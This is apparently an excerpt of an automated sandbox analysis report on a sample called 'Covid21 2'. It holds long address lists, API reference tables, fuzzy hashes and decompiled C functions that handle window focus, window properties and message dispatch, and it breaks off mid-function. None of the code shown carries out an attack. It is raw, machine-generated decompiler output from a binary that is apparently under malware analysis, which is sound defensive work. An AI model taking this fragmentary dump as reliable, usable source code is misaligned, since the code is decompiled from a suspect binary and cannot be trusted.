                                  0x00408251
                                  0x00408253
                                  0x00408255
                                  0x00408257
                                  0x00408259
                                  0x0040825b
                                  0x0040825d
                                  0x0040825f
                                  0x00408261
                                  0x00408263
                                  0x00408265
                                  0x00408267
                                  0x00408269
                                  0x0040826b
                                  0x0040826d
                                  0x0040826f
                                  0x00408271
                                  0x00408273
                                  0x00408275
                                  0x00408277
                                  0x00408279
                                  0x0040827b
                                  0x0040827d
                                  0x0040827f
                                  0x00408281
                                  0x00408283
                                  0x00408285
                                  0x00408287
                                  0x00408289
                                  0x0040828b
                                  0x0040828d
                                  0x0040828f
                                  0x00408291
                                  0x00408293
                                  0x00408295
                                  0x00408297
                                  0x00408299
                                  0x0040829b
                                  0x0040829d
                                  0x0040829f
                                  0x004082a1
                                  0x004082a3
                                  0x004082a5
                                  0x004082a7
                                  0x004082a9
                                  0x004082ab
                                  0x004082ad
                                  0x004082af
                                  0x004082b1
                                  0x004082b3
                                  0x004082b5
                                  0x004082b7
                                  0x004082b9
                                  0x004082bb
                                  0x004082bd
                                  0x004082bf
                                  0x004082c1
                                  0x004082c3
                                  0x004082c5
                                  0x004082c7
                                  0x004082c9
                                  0x004082cb
                                  0x004082cd
                                  0x004082cf
                                  0x004082d1
                                  0x004082d3
                                  0x004082d5
                                  0x004082d7
                                  0x004082d9
                                  0x004082db
                                  0x004082dd
                                  0x004082df
                                  0x004082e1
                                  0x004082e3
                                  0x004082e5
                                  0x004082e7
                                  0x004082e9
                                  0x004082eb
                                  0x004082ed
                                  0x004082ef
                                  0x004082f1
                                  0x004082f3
                                  0x004082f5
                                  0x004082f7
                                  0x004082f9
                                  0x004082fb
                                  0x004082fd
                                  0x004082ff
                                  0x00408301
                                  0x00408303
                                  0x00408305
                                  0x00408307
                                  0x00408309
                                  0x0040830b
                                  0x0040830d
                                  0x0040830f
                                  0x00408311
                                  0x00408313
                                  0x00408315
                                  0x00408317
                                  0x00408319
                                  0x0040831b
                                  0x0040831d
                                  0x0040831f
                                  0x00408321
                                  0x00408323
                                  0x00408325
                                  0x00408327
                                  0x00408329
                                  0x0040832b
                                  0x0040832d
                                  0x0040832f
                                  0x00408331
                                  0x00408333
                                  0x00408335
                                  0x00408337
                                  0x00408339
                                  0x0040833b
                                  0x0040833d
                                  0x0040833f
                                  0x00408341
                                  0x00408343
                                  0x00408345
                                  0x00408347
                                  0x00408349
                                  0x0040834b
                                  0x0040834d
                                  0x0040834f
                                  0x00408351
                                  0x00408353
                                  0x00408355
                                  0x00408357
                                  0x00408359
                                  0x0040835b
                                  0x0040835d
                                  0x0040835f
                                  0x00408361
                                  0x00408363
                                  0x00408365
                                  0x00408367
                                  0x00408369
                                  0x0040836b
                                  0x0040836d
                                  0x0040836f
                                  0x00408371
                                  0x00408373
                                  0x00408375
                                  0x00408377
                                  0x00408379
                                  0x0040837b
                                  0x0040837d
                                  0x0040837f
                                  0x00408381
                                  0x00408383
                                  0x00408385
                                  0x00408387
                                  0x00408389
                                  0x0040838b
                                  0x0040838d
                                  0x0040838f
                                  0x00408391
                                  0x00408393
                                  0x00408395
                                  0x00408397
                                  0x00408399
                                  0x0040839b
                                  0x0040839d
                                  0x0040839f
                                  0x004083a1
                                  0x004083a3
                                  0x004083a5
                                  0x004083a7
                                  0x004083a9
                                  0x004083ab
                                  0x004083ad
                                  0x004083af
                                  0x004083b1
                                  0x004083b3
                                  0x004083b5
                                  0x004083b7
                                  0x004083b9
                                  0x004083bb
                                  0x004083bd
                                  0x004083bf
                                  0x004083c1
                                  0x004083c3
                                  0x004083c5
                                  0x004083c7
                                  0x004083c9
                                  0x004083cb
                                  0x004083cd
                                  0x004083cf
                                  0x004083d1
                                  0x004083d3
                                  0x004083d5
                                  0x004083d7
                                  0x004083d9
                                  0x004083db
                                  0x004083dd
                                  0x004083df
                                  0x004083e1
                                  0x004083e3
                                  0x004083e5
                                  0x004083e7
                                  0x004083e9
                                  0x004083eb
                                  0x004083ed
                                  0x004083ef
                                  0x004083f1
                                  0x004083f3
                                  0x004083f5
                                  0x004083f7
                                  0x004083f9
                                  0x004083fb
                                  0x004083fd
                                  0x004083ff
                                  0x00408401
                                  0x00408403
                                  0x00408405
                                  0x00408407
                                  0x00408409
                                  0x0040840b
                                  0x0040840d
                                  0x0040840f
                                  0x00408411
                                  0x00408413
                                  0x00408415
                                  0x00408417
                                  0x00408419
                                  0x0040841b
                                  0x0040841d
                                  0x0040841f
                                  0x00408421
                                  0x00408423
                                  0x00408425
                                  0x00408427
                                  0x00408429
                                  0x0040842b
                                  0x0040842d
                                  0x0040842f
                                  0x00408431
                                  0x00408433
                                  0x00408435
                                  0x00408437
                                  0x00408439
                                  0x0040843b
                                  0x0040843d
                                  0x0040843f
                                  0x00408441
                                  0x00408443
                                  0x00408445
                                  0x00408447
                                  0x00408449
                                  0x0040844b
                                  0x0040844d
                                  0x0040844f
                                  0x00408451
                                  0x00408453
                                  0x00408455
                                  0x00408457
                                  0x00408459
                                  0x0040845b
                                  0x0040845d
                                  0x0040845f
                                  0x00408461
                                  0x00408463
                                  0x00408465
                                  0x00408467
                                  0x00408469
                                  0x0040846b
                                  0x0040846d
                                  0x0040846f
                                  0x00408471
                                  0x00408473
                                  0x00408475
                                  0x00408477
                                  0x00408479
                                  0x0040847b
                                  0x0040847d
                                  0x0040847f
                                  0x00408481
                                  0x00408483
                                  0x00408485
                                  0x00408487
                                  0x00408489
                                  0x0040848b
                                  0x0040848d
                                  0x0040848f
                                  0x00408491
                                  0x00408493
                                  0x00408495
                                  0x00408497
                                  0x00408499
                                  0x0040849b
                                  0x0040849d
                                  0x0040849f
                                  0x004084a1
                                  0x004084a3
                                  0x004084a5
                                  0x004084a7
                                  0x004084a9
                                  0x004084ab
                                  0x004084ad
                                  0x004084af
                                  0x004084b1
                                  0x004084b3
                                  0x004084b5
                                  0x004084b7
                                  0x004084b9
                                  0x004084bb
                                  0x004084bd
                                  0x004084bf
                                  0x004084c1
                                  0x004084c3
                                  0x004084c5
                                  0x004084c7
                                  0x004084c9
                                  0x004084cb
                                  0x004084cd
                                  0x004084cf
                                  0x004084d1
                                  0x004084d3
                                  0x004084d5
                                  0x004084d7
                                  0x004084d9
                                  0x004084db
                                  0x004084dd
                                  0x004084df
                                  0x004084e1
                                  0x004084e3
                                  0x004084e5
                                  0x004084e7
                                  0x004084e9
                                  0x004084eb
                                  0x004084ed
                                  0x004084ef
                                  0x004084f1
                                  0x004084f3
                                  0x004084f5
                                  0x004084f7
                                  0x004084f9
                                  0x004084fb
                                  0x004084fd
                                  0x004084ff
                                  0x00408501
                                  0x00408503
                                  0x00408505
                                  0x00408507
                                  0x00408509
                                  0x0040850b
                                  0x0040850d
                                  0x0040850f
                                  0x00408511
                                  0x00408513
                                  0x00408515
                                  0x00408517
                                  0x00408519
                                  0x0040851b
                                  0x0040851d
                                  0x0040851f
                                  0x00408521
                                  0x00408523
                                  0x00408525
                                  0x00408527
                                  0x00408529
                                  0x0040852b
                                  0x0040852d
                                  0x0040852f
                                  0x00408531
                                  0x00408533
                                  0x00408535
                                  0x00408537
                                  0x00408539
                                  0x0040853b
                                  0x0040853d
                                  0x0040853f
                                  0x00408541
                                  0x00408543
                                  0x00408545
                                  0x00408547
                                  0x00408549
                                  0x0040854b
                                  0x0040854d
                                  0x0040854f
                                  0x00408551
                                  0x00408553
                                  0x00408555
                                  0x00408557
                                  0x00408559
                                  0x0040855b
                                  0x0040855d
                                  0x0040855f
                                  0x00408561
                                  0x00408563
                                  0x00408565
                                  0x00408567
                                  0x00408569
                                  0x0040856b
                                  0x0040856d
                                  0x0040856f
                                  0x00408571
                                  0x00408573
                                  0x00408575
                                  0x00408577
                                  0x00408579
                                  0x0040857b
                                  0x0040857d
                                  0x0040857f
                                  0x00408581
                                  0x00408583
                                  0x00408585
                                  0x00408587
                                  0x00408589
                                  0x0040858b
                                  0x0040858d
                                  0x0040858f
                                  0x00408591
                                  0x00408593
                                  0x00408595
                                  0x00408597
                                  0x00408599
                                  0x0040859b
                                  0x0040859d
                                  0x0040859f
                                  0x004085a1
                                  0x004085a3
                                  0x004085a5
                                  0x004085a7
                                  0x004085a9
                                  0x004085ab
                                  0x004085ad
                                  0x004085af
                                  0x004085b1
                                  0x004085b3
                                  0x004085b5
                                  0x004085b7
                                  0x004085b9
                                  0x004085bb
                                  0x004085bd
                                  0x004085bf
                                  0x004085c1
                                  0x004085c3
                                  0x004085c5
                                  0x004085c7
                                  0x004085c9
                                  0x004085cb
                                  0x004085cd
                                  0x004085cf
                                  0x004085d1
                                  0x004085d3
                                  0x004085d5
                                  0x004085d7
                                  0x004085d9
                                  0x004085db
                                  0x00408c21
                                  0x00408c23
                                  0x00408c25
                                  0x00408c27
                                  0x00408c29
                                  0x00408c2b
                                  0x00408c2d
                                  0x00408c2f
                                  0x00408c31
                                  0x00408c33
                                  0x00408c35
                                  0x00408c37
                                  0x00408c39
                                  0x00408c3b
                                  0x00408c3d
                                  0x00408c3f
                                  0x00408c41
                                  0x00408c43
                                  0x00408c45
                                  0x00408c47
                                  0x00408c49
                                  0x00408c4b
                                  0x00408c4d
                                  0x00408c4f
                                  0x00408c51
                                  0x00408c53
                                  0x00408c55
                                  0x00408c57
                                  0x00408c59
                                  0x00408c5b
                                  0x00408c5d
                                  0x00408c5f
                                  0x00408c61
                                  0x00408c63
                                  0x00408c65
                                  0x00408c67
                                  0x00408c69
                                  0x00408c6b
                                  0x00408c6d
                                  0x00408c6f
                                  0x00408c71
                                  0x00408c73
                                  0x00408c75
                                  0x00408c77
                                  0x00408c79
                                  0x00408c7b
                                  0x00408c7d
                                  0x00408c7f
                                  0x00408c81
                                  0x00408c83
                                  0x00408c85
                                  0x00408c87
                                  0x00408c89
                                  0x00408c8b
                                  0x00408c8d
                                  0x00408c8f
                                  0x00408c91
                                  0x00408c93
                                  0x00408c95
                                  0x00408c97
                                  0x00408c99
                                  0x00408c9b
                                  0x00408c9d
                                  0x00408c9f
                                  0x00408ca1
                                  0x00408ca3
                                  0x00408ca5
                                  0x00408ca7
                                  0x00408ca9
                                  0x00408cab
                                  0x00408cad
                                  0x00408caf
                                  0x00408cb1
                                  0x00408cb3
                                  0x00408cb5
                                  0x00408cb7
                                  0x00408cb9
                                  0x00408cbb
                                  0x00408cbd
                                  0x00408cbf
                                  0x00408cc1
                                  0x00408cc3
                                  0x00408cc5
                                  0x00408cc7
                                  0x00408cc9
                                  0x00408ccb
                                  0x00408ccd
                                  0x00408ccf
                                  0x00408cd1
                                  0x00408cd3
                                  0x00408cd5
                                  0x00408cd7
                                  0x00408cd9
                                  0x00408cdb
                                  0x00408cdd
                                  0x00408cdf
                                  0x00408ce1
                                  0x00408ce3
                                  0x00408ce5
                                  0x00408ce7
                                  0x00408ce9
                                  0x00408ceb
                                  0x00408ced
                                  0x00408cef
                                  0x00408cf1
                                  0x00408cf3
                                  0x00408cf5
                                  0x00408cf7
                                  0x00408cf9
                                  0x00408cfb
                                  0x00408cfd
                                  0x00408cff
                                  0x00408d01
                                  0x00408d03
                                  0x00408d05
                                  0x00408d07
                                  0x00408d09
                                  0x00408d0b
                                  0x00408d0d
                                  0x00408d0f
                                  0x00408d11
                                  0x00408d13
                                  0x00408d15
                                  0x00408d17
                                  0x00408d19
                                  0x00408d1b
                                  0x00408d1d
                                  0x00408d1f
                                  0x00408d21
                                  0x00408d23
                                  0x00408d25
                                  0x00408d27
                                  0x00408d29
                                  0x00408d2b
                                  0x00408d2d
                                  0x00408d2f
                                  0x00408d31
                                  0x00408d33
                                  0x00408d35
                                  0x00408d37
                                  0x00408d39
                                  0x00408d3b
                                  0x00408d3d
                                  0x00408d3f
                                  0x00408d41
                                  0x00408d43
                                  0x00408d45
                                  0x00408d47
                                  0x00408d49
                                  0x00408d4b
                                  0x00408d4d
                                  0x00408d4f
                                  0x00408d51
                                  0x00408d53
                                  0x00408d55
                                  0x00408d57
                                  0x00408d59
                                  0x00408d5b
                                  0x00408d5d
                                  0x00408d5f
                                  0x00408d61
                                  0x00408d63
                                  0x00408d65
                                  0x00408d67
                                  0x00408d69
                                  0x00408d6b
                                  0x00408d6d
                                  0x00408d6f
                                  0x00408d71
                                  0x00408d73
                                  0x00408d75
                                  0x00408d77
                                  0x00408d79
                                  0x00408d7b
                                  0x00408d7d
                                  0x00408d7f
                                  0x00408d81
                                  0x00408d83
                                  0x00408d85
                                  0x00408d87
                                  0x00408d89
                                  0x00408d8b
                                  0x00408d8d
                                  0x00408d8f
                                  0x00408d91
                                  0x00408d93
                                  0x00408d95
                                  0x00408d97
                                  0x00408d99
                                  0x00408d9b
                                  0x00408d9d
                                  0x00408d9f
                                  0x00408da1
                                  0x00408da3
                                  0x00408da5
                                  0x00408da7
                                  0x00408da9
                                  0x00408dab
                                  0x00408dad
                                  0x00408daf
                                  0x00408db1
                                  0x00408db3
                                  0x00408db5
                                  0x00408db7
                                  0x00408db9
                                  0x00408dbb
                                  0x00408dbd
                                  0x00408dbf
                                  0x00408dc1
                                  0x00408dc3
                                  0x00408dc5
                                  0x00408dc7
                                  0x00408dc9
                                  0x00408dcb
                                  0x00408dcd
                                  0x00408dcf
                                  0x00408dd1
                                  0x00408dd3
                                  0x00408dd5
                                  0x00408dd7
                                  0x00408dd9
                                  0x00408ddb
                                  0x00408ddd
                                  0x00408ddf
                                  0x00408de1
                                  0x00408de3
                                  0x00408de5
                                  0x00408de7
                                  0x00408de9
                                  0x00408deb
                                  0x00408ded
                                  0x00408def
                                  0x00408df1
                                  0x00408df3
                                  0x00408df5
                                  0x00408df7
                                  0x00408df9
                                  0x00408dfb
                                  0x00408dfd
                                  0x00408dff
                                  0x00408e01
                                  0x00408e03
                                  0x00408e05
                                  0x00408e07
                                  0x00408e09
                                  0x00408e0b
                                  0x00408e0d
                                  0x00408e0f
                                  0x00408e11
                                  0x00408e13
                                  0x00408e15
                                  0x00408e17
                                  0x00408e19
                                  0x00408e1b
                                  0x00408e1d
                                  0x00408e1f
                                  0x00408e21
                                  0x00408e23
                                  0x00408e25
                                  0x00408e27
                                  0x00408e29
                                  0x00408e2b
                                  0x00408e2d
                                  0x00408e2f
                                  0x00408e31
                                  0x00408e33
                                  0x00408e35
                                  0x00408e37
                                  0x00408e39
                                  0x00408e3b
                                  0x00408e3d
                                  0x00408e3f
                                  0x00408e41
                                  0x00408e43
                                  0x00408e45
                                  0x00408e47
                                  0x00408e49
                                  0x00408e4b
                                  0x00408e4d
                                  0x00408e4f
                                  0x00408e51
                                  0x00408e53
                                  0x00408e55
                                  0x00408e57
                                  0x00408e59
                                  0x00408e5b
                                  0x00408e5d
                                  0x00408e5f
                                  0x00408e61
                                  0x00408e63
                                  0x00408e65
                                  0x00408e67
                                  0x00408e69
                                  0x00408e6b
                                  0x00408e6d
                                  0x00408e6f
                                  0x00408e71
                                  0x00408e73
                                  0x00408e75
                                  0x00408e77
                                  0x00408e79
                                  0x00408e7b
                                  0x00408e7d
                                  0x00408e7f
                                  0x00408e81
                                  0x00408e83
                                  0x00408e85
                                  0x00408e87
                                  0x00408e89
                                  0x00408e8b
                                  0x00408e8d
                                  0x00408e8f
                                  0x00408e91
                                  0x00408e93
                                  0x00408e95
                                  0x00408e97
                                  0x00408e99
                                  0x00408e9b
                                  0x00408e9d
                                  0x00408e9f
                                  0x00408ea1
                                  0x00408ea3
                                  0x00408ea5
                                  0x00408ea7
                                  0x00408ea9
                                  0x00408eab
                                  0x00408ead
                                  0x00408eaf
                                  0x00408eb1
                                  0x00408eb3
                                  0x00408eb5
                                  0x00408eb7
                                  0x00408eb9
                                  0x00408ebb
                                  0x00408ebd
                                  0x00408ebf
                                  0x00408ec1
                                  0x00408ec3
                                  0x00408ec5
                                  0x00408ec7
                                  0x00408ec9
                                  0x00408ecb
                                  0x00408ecd
                                  0x00408ecf
                                  0x00408ed1
                                  0x00408ed3
                                  0x00408ed5
                                  0x00408ed7
                                  0x00408ed9
                                  0x00408edb
                                  0x00408edd
                                  0x00408edf
                                  0x00408ee1
                                  0x00408ee3
                                  0x00408ee5
                                  0x00408ee7
                                  0x00408ee9
                                  0x00408eeb
                                  0x00408eed
                                  0x00408eef
                                  0x00408ef1
                                  0x00408ef3
                                  0x00408ef5
                                  0x00408ef7
                                  0x00408ef9
                                  0x00408efb
                                  0x00408efd
                                  0x00408eff
                                  0x00408f01
                                  0x00408f03
                                  0x00408f05
                                  0x00408f07
                                  0x00408f09
                                  0x00408f0b
                                  0x00408f0d
                                  0x00408f0f
                                  0x00408f11
                                  0x00408f13
                                  0x00408f15
                                  0x00408f17
                                  0x00408f19
                                  0x00408f1b
                                  0x00408f1d
                                  0x00408f1f
                                  0x00408f21
                                  0x00408f23
                                  0x00408f25
                                  0x00408f27
                                  0x00408f29
                                  0x00408f2b
                                  0x00408f2d
                                  0x00408f2f
                                  0x00408f31
                                  0x00408f33
                                  0x00408f35
                                  0x00408f37
                                  0x00408f39
                                  0x00408f3b
                                  0x00408f3d
                                  0x00408f3f
                                  0x00408f41
                                  0x00408f43
                                  0x00408f45
                                  0x00408f47
                                  0x00408f49
                                  0x00408f4b
                                  0x00408f4d
                                  0x00408f4f
                                  0x00408f51
                                  0x00408f53
                                  0x00408f55
                                  0x00408f57
                                  0x00408f59
                                  0x00408f5b
                                  0x00408f5d
                                  0x00408f5f
                                  0x00408f61
                                  0x00408f63
                                  0x00408f65
                                  0x00408f67
                                  0x00408f69
                                  0x00408f6b
                                  0x00408f6d
                                  0x00408f6f
                                  0x00408f71
                                  0x00408f73
                                  0x00408f75
                                  0x00408f77
                                  0x00408f79
                                  0x00408f7b
                                  0x00408f7d
                                  0x00408f7f
                                  0x00408f81
                                  0x00408f83
                                  0x00408f85
                                  0x00408f87
                                  0x00408f89
                                  0x00408f8b
                                  0x00408f8d
                                  0x00408f8f
                                  0x00408f91
                                  0x00408f93
                                  0x00408f95
                                  0x00408f97
                                  0x00408f99
                                  0x00408f9b
                                  0x00408f9d
                                  0x00408f9f
                                  0x00408fa1
                                  0x00408fa3
                                  0x00408fa5
                                  0x00408fa7
                                  0x00408fa9
                                  0x00408fab
                                  0x00408fad
                                  0x00408faf
                                  0x00408fb1
                                  0x00408fb3
                                  0x00408fb5
                                  0x00408fb7
                                  0x00408fb9
                                  0x00408fbb
                                  0x00408fbd
                                  0x00408fbf
                                  0x00408fc1
                                  0x00408fc3
                                  0x00408fc5
                                  0x00408fc7
                                  0x00408fc9
                                  0x00408fcb
                                  0x00408fcd
                                  0x00408fcf
                                  0x00408fd1
                                  0x00408fd3
                                  0x00408fd5
                                  0x00408fd7
                                  0x00408fd9
                                  0x00408fdb
                                  0x00408fdd
                                  0x00408fdf
                                  0x00408fe1
                                  0x00408fe3
                                  0x00408fe5
                                  0x00408fe7
                                  0x00408fe9
                                  0x00408feb
                                  0x00408fed
                                  0x00408fef
                                  0x00408ff1
                                  0x00408ff3
                                  0x00408ff5
                                  0x00408ff7
                                  0x00408ff9
                                  0x00408ffb
                                  0x00408ffd
                                  0x00408fff
                                  0x00409001
                                  0x00409003
                                  0x00409006
                                  0x00409006
                                  0x00409007
                                  0x0040905a
                                  0x0040905a
                                  0x0040905b
                                  0x0040905c
                                  0x004090cd
                                  0x004090cd
                                  0x004090ce
                                  0x004090d0
                                  0x004090d3
                                  0x004090d4
                                  0x004090d6
                                  0x004090d8
                                  0x004090d9
                                  0x004090d9
                                  0x004090db
                                  0x004090e2
                                  0x004090e3
                                  0x004090e6
                                  0x004090ea
                                  0x004090ec
                                  0x004090ec
                                  0x004090ec
                                  0x004090ec
                                  0x004090ed
                                  0x004090ef
                                  0x0040911d
                                  0x0040911d
                                  0x00000000
                                  0x00000000
                                  0x0040911f
                                  0x00409128
                                  0x00409128
                                  0x0040912f
                                  0x00409131
                                  0x00000000
                                  0x00000000
                                  0x00409133
                                  0x00409137
                                  0x0040913a
                                  0x0040913a
                                  0x00409122
                                  0x00409122
                                  0x00000000
                                  0x00000000
                                  0x00409122
                                  0x00409121
                                  0x00000000
                                  0x00409121
                                  0x004090f1
                                  0x004090f2
                                  0x004090f3
                                  0x004090f4
                                  0x004090f9
                                  0x004090fa
                                  0x004090fa
                                  0x004090fb
                                  0x004090fc
                                  0x004090fe
                                  0x00409100
                                  0x00409100
                                  0x00409104
                                  0x00409104
                                  0x0040910b
                                  0x0040910c
                                  0x0040910d
                                  0x00409112
                                  0x00409114
                                  0x00409116
                                  0x00000000
                                  0x0040911c
                                  0x0040905e
                                  0x004090a1
                                  0x004090a1
                                  0x004090a4
                                  0x004090a4
                                  0x004090a6
                                  0x004090a7
                                  0x004090a8
                                  0x00000000
                                  0x00000000
                                  0x004090aa
                                  0x004090ac
                                  0x004090ad
                                  0x004090ae
                                  0x004090ae
                                  0x004090b1
                                  0x004090b3
                                  0x004090b3
                                  0x004090b3
                                  0x004090b6
                                  0x00000000
                                  0x00000000
                                  0x004090b8
                                  0x004090b9
                                  0x004090ba
                                  0x004090bc
                                  0x004090bd
                                  0x00000000
                                  0x00000000
                                  0x004090bf
                                  0x004090c0
                                  0x004090c1
                                  0x004090c2
                                  0x004090c3
                                  0x004090c3
                                  0x004090c4
                                  0x004090c6
                                  0x004090c6
                                  0x004090c8
                                  0x004090c8
                                  0x004090c9
                                  0x00000000
                                  0x00000000
                                  0x004090cc
                                  0x00000000
                                  0x004090cc
                                  0x00409060
                                  0x00409063
                                  0x00000000
                                  0x00000000
                                  0x00409065

                                  APIs
                                  • sprintf.MSVCRT ref: 00407F25
                                  • GetPropA.USER32(00000000,?), ref: 00407F40
                                  • GetPropA.USER32(00404DB1,?), ref: 00407F62
                                  • HeapFree.KERNEL32(00000000,?,?,00000000,00000010), ref: 00407F7B
                                  • RtlAllocateHeap.NTDLL(00000008,00000028), ref: 00407FB3
                                  • RtlAllocateHeap.NTDLL(00000008,00000018), ref: 00407FD4
                                  • SetPropA.USER32(00404DB1,?,00000000), ref: 00407FE0
                                  • SetWindowLongA.USER32(00404DB1,000000FC,00407E1A), ref: 00407FEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: HeapProp$Allocate$FreeLongWindowsprintf
                                  • String ID: PB_GadgetStack_%i
                                  • API String ID: 765838127-1190326050
                                  • Opcode ID: e5eb7ea4f734b695530acc5a332d78697251fa88f1f3ffbef3ff32b69048928e
                                  • Instruction ID: 0079b016ce4f4140cb49a2b1502a0785ed6019fc8fd11791dd2fa74e733ae66f
                                  • Opcode Fuzzy Hash: e5eb7ea4f734b695530acc5a332d78697251fa88f1f3ffbef3ff32b69048928e
                                  • Instruction Fuzzy Hash: 4B3124B0904705AFC720DF24D984A56BBF8FB08311F10892EE496A76A0D778A954CF9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00405C70(intOrPtr _a4) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				struct HWND__* _v16;
                                  				struct HWND__* _v20;
                                  				struct HWND__* _v24;
                                  				char _v76;
                                  				void* _t26;
                                  				struct HWND__* _t38;
                                  				intOrPtr* _t40;
                                  				struct HWND__* _t41;
                                  
                                  				_v8 = GetActiveWindow();
                                  				_t38 = GetFocus();
                                  				_v20 = 0;
                                  				_v16 = 0;
                                  				_v12 = 0;
                                  				if(IsChild(_v8, _t38) == 0) {
                                  					_v24 = 0;
                                  					L8:
                                  					_push( &_v24);
                                  					if(_a4 == 0) {
                                  						_t40 =  *0x40a85c; // 0x72e7a980
                                  						_t26 =  *_t40(_v8, 0x405bb5);
                                  						if(_v16 == 0) {
                                  							L14:
                                  							return _t26;
                                  						}
                                  						return  *_t40(_v8, 0x405bb5,  &_v24);
                                  					}
                                  					_t26 =  *0x40a85c(_v8, E00405C1A);
                                  					if(_v12 != 0 || _v20 == 0) {
                                  						goto L14;
                                  					} else {
                                  						return SetFocus(_v20);
                                  					}
                                  				}
                                  				_v24 = _t38;
                                  				_t41 = _t38;
                                  				if(_t38 == 0) {
                                  					goto L8;
                                  				} else {
                                  					goto L2;
                                  				}
                                  				do {
                                  					L2:
                                  					GetClassNameA(_t41,  &_v76, 0x32);
                                  					if(strcmp( &_v76, "MDI_ChildClass") == 0) {
                                  						_v8 = _t41;
                                  						if(_t38 == _t41) {
                                  							_v24 = 0;
                                  						}
                                  					}
                                  					_t41 = GetParent(_t41);
                                  				} while (_t41 != 0);
                                  				goto L8;
                                  			}














                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Focus$ActiveChildClassNameParentWindowstrcmp
                                  • String ID: MDI_ChildClass
                                  • API String ID: 1701595447-1946758919
                                  • Opcode ID: 988777d83d435900f4e6347359a80255c0a00559c1b171bf8b6f6dc761034bc8
                                  • Instruction ID: a705aa9bed059d8bd142721d9e0f0f0abb2c12223c0bddd2eb61c98d35858e50
                                  • Opcode Fuzzy Hash: 988777d83d435900f4e6347359a80255c0a00559c1b171bf8b6f6dc761034bc8
                                  • Instruction Fuzzy Hash: CE212172D04719EBDF11AFA59D888AFBBB8EF44301B24843BE501B2250D7384E51DF5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E004056EF(struct HWND__* _a4, intOrPtr _a8, struct HDC__* _a12, signed int _a16) {
                                  				signed int _v8;
                                  				struct HWND__* _v12;
                                  				struct tagRECT _v28;
                                  				signed int* _t95;
                                  				void* _t96;
                                  				struct HWND__* _t97;
                                  				signed int _t98;
                                  				intOrPtr _t99;
                                  				struct HBRUSH__* _t100;
                                  				struct HBRUSH__* _t102;
                                  				signed short _t110;
                                  				signed short _t111;
                                  				signed short _t112;
                                  				signed short _t113;
                                  				void* _t118;
                                  				unsigned int _t120;
                                  				long _t123;
                                  				struct HWND__* _t125;
                                  				void* _t131;
                                  				void* _t134;
                                  				struct HBRUSH__* _t137;
                                  				struct HBRUSH__* _t140;
                                  				void* _t142;
                                  				void* _t145;
                                  				struct HWND__* _t147;
                                  				intOrPtr* _t148;
                                  				struct HBRUSH__* _t149;
                                  				struct HBRUSH__* _t150;
                                  				signed int _t151;
                                  				signed int _t155;
                                  				struct HWND__* _t156;
                                  				signed int* _t157;
                                  				void* _t172;
                                  
                                  				_t148 = 0;
                                  				_t95 = E0040642D( *0x40b478);
                                  				_t156 = _a16;
                                  				_t157 = _t95;
                                  				_t96 = E0040523F(_a4, _a8, _a12, _t156);
                                  				if(_t96 != 0xd0d0d0d1) {
                                  					L105:
                                  					return _t96;
                                  				}
                                  				_t97 = _a4;
                                  				_v12 = _t97;
                                  				if(_t97 == 0) {
                                  					L6:
                                  					_t15 =  &_v8;
                                  					 *_t15 = _v8 | 0xffffffff;
                                  					__eflags =  *_t15;
                                  					L7:
                                  					_t155 = 0;
                                  					if(_t148 == 0) {
                                  						L21:
                                  						_t98 = _t157[0x14];
                                  						__eflags = _t98 - _t155;
                                  						if(_t98 == _t155) {
                                  							L11:
                                  							_t99 = _a8;
                                  							_t151 = _v8;
                                  							_a16 = 0xd0d0d0d1;
                                  							_t157[1] = _t151;
                                  							if(_t99 > 0x115) {
                                  								__eflags = _t99 - 0x332f;
                                  								if(__eflags > 0) {
                                  									_t100 = _t99 - 0x3331;
                                  									__eflags = _t100;
                                  									if(_t100 == 0) {
                                  										_t157[3] = 0x3331;
                                  										L102:
                                  										_t157[0x15] = _t156;
                                  										L103:
                                  										_a16 = _t155;
                                  										L104:
                                  										return _a16;
                                  									}
                                  									_t102 = _t100 - 1;
                                  									__eflags = _t102;
                                  									if(_t102 == 0) {
                                  										_t157[3] = 0x3332;
                                  										 *_t157 = _a12;
                                  										goto L102;
                                  									}
                                  									__eflags = _t102 != 0xe;
                                  									if(_t102 != 0xe) {
                                  										goto L104;
                                  									}
                                  									L98:
                                  									_push(_t156);
                                  									_push(_a12);
                                  									_push(_a8);
                                  									_push(_a4);
                                  									_push(_t156);
                                  									L99:
                                  									_a16 = L00405625();
                                  									goto L104;
                                  								}
                                  								if(__eflags == 0) {
                                  									_t157[3] = 0x332c;
                                  									 *_t157 = _a12;
                                  									_t157[2] = _t156;
                                  									goto L103;
                                  								}
                                  								__eflags = _t99 - 0x133;
                                  								if(_t99 < 0x133) {
                                  									goto L104;
                                  								}
                                  								__eflags = _t99 - 0x135;
                                  								if(_t99 <= 0x135) {
                                  									goto L98;
                                  								}
                                  								__eflags = _t99 - 0x138;
